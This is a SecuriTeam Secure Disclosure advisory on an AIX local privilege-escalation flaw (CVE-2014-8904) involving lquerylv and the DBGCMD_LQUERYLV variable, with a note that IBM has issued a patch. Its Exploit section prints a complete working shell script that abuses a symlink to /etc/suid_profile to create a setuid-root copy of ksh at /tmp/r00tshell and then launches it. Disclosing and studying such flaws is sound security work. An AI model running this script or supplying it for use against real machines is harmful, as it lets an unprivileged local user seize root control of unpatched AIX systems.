SSD Advisory – AIX cmdlvm Vulnerability

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
AIX (Advanced Interactive eXecutive) is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms. Originally released for the IBM 6150 RISC workstation, AIX now supports or has supported a wide variety of hardware platforms, including the IBM RS/6000 series and later POWER and PowerPC-based systems, IBM System i, System/370 mainframes, PS/2 personal computers, and the Apple Network Server.
Vulnerability Details
The running of lquerylv command with variable DBGCMD_LQUERYLV set may allow a local user to gain root privileges.

Exploit

#!/bin/sh
#
# From file writing to command execution
# Tested on AIX 7.1
#
export _DBGCMD_LQUERYLV=1
umask 0000
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv
cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF
/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # Any SUID root binaries with execve(), or system()
echo "[!] Remove the /etc/suid_profile!"
/tmp/r00tshell

Vendor Response
IBM has released an advisory and a patch for AIX servers: AIX cmdlvm vulnerability.
CVE
One CVE entry has been released for this vulnerability: CVE-2014-8904

Interested in Buffer Overflow? You may be interested in these:

Looking to submit a Buffer Overflow vulnerability?

Talk to us!